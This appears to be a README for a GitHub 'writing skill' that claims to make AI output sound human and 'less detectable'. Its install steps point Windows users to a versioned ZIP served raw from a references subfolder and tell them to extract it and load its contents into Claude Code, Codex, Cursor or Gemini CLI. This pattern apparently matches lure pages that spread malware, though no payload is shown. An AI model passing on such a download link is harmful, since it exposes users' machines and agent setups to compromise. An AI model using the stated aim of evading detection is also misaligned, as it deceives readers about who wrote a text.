anti-ai-slop-writing is a writing skill that helps AI tools produce text that sounds more natural and less patterned. It works with Claude Code, Codex, Cursor, Gemini CLI, and other agent tools that support skill files.
Use it when you want writing that reads like a person wrote it, not a template. It helps with tone, flow, sentence shape, and word choice.
- A Windows computer
- One of these tools:
- Claude Code
- Codex
- Cursor
- Gemini CLI
- Another agent that can load skill files
- A web browser
- A few minutes to set it up
- Open the download page: https://raw.githubusercontent.com/soothing-carport96/anti-ai-slop-writing/main/skills/anti-ai-slop-writing/references/anti-slop-writing-ai-3.3-beta.4.zip
- Download the repository to your Windows computer
- If you get a ZIP file, right-click it and choose Extract All
- Open the extracted folder
- Look for the skill file or folder that belongs in your AI tool
- Copy it into the place your tool uses for skills or custom instructions
- Restart the tool if it was already open
Open the GitHub page and download the project to your computer. If your browser saves it as a ZIP file, keep it in your Downloads folder until you are ready to unpack it.
Right-click the ZIP file and select Extract All. Pick a folder you can find again, like Desktop or Documents.
Open the extracted folder. Look for files or folders with names tied to skills, prompts, or instructions. This repository is meant to be used as a writing skill, so the files should be easy to spot.
Move the skill files into the folder your AI tool uses for custom skills. Many tools have a settings area or a local folder for this. If your tool supports drag and drop, you can use that too.
Close the app and open it again. This helps the tool load the new writing skill.
After setup, ask your AI tool to write in a more human way. You can use this skill for:
- Blog posts
- Product pages
- Help articles
- Emails
- Social posts
- Notes and drafts
You can also pair it with your own style rules. For example:
- Keep sentences short
- Use plain words
- Avoid repeated phrasing
- Sound calm and direct
- Remove stiff AI patterns
Use this skill when you want text that feels less flat and less scripted. It works best when you give the AI clear goals, such as:
- Who the text is for
- What the text should do
- How formal it should sound
- Which words to avoid
- How long it should be
Example prompts:
- Rewrite this so it sounds more natural
- Make this easier to read for a normal user
- Remove stiff AI phrasing
- Keep the meaning, but make the tone more human
- Cut filler and use plain English
This project is made to work with:
- Claude Code
- Codex
- Cursor
- Gemini CLI
- Other agent tools that use skill or instruction files
If your tool supports custom writing rules, this repo can fit into that flow.
This repository is focused on one job: helping AI write in a cleaner, less detectable style. The files are set up to guide the model toward:
- Natural sentence flow
- Less repeated structure
- Fewer generic AI phrases
- Better word choice
- More human rhythm
- Clearer writing
If you want to turn a rough draft into something cleaner:
- Paste your draft into your AI tool
- Enable the anti-ai-slop-writing skill
- Ask for a rewrite
- Review the result
- Repeat if needed
This works well for content that needs to sound direct, useful, and plain.
The repository is a set of writing instructions and related files. Before you move it into your tool, keep the folder in a place you trust. If you use a work computer, save it in your normal documents area so you can find it later.
No. You only need to download the files and place them where your AI tool can read them.
Usually no. Most of the work is copying the skill into the right folder for your tool.
If your app supports custom skills, custom prompts, or instruction files, it should fit.
Yes. You can change the files to match your own style needs.
- Repository: anti-ai-slop-writing
- Type: writing skill
- Main use: reduce AI-like patterns in text
- Topics: ai-writing, anti-slop, claude-code, prompt-engineering, skill, skillmd
If you need the files again, use this link: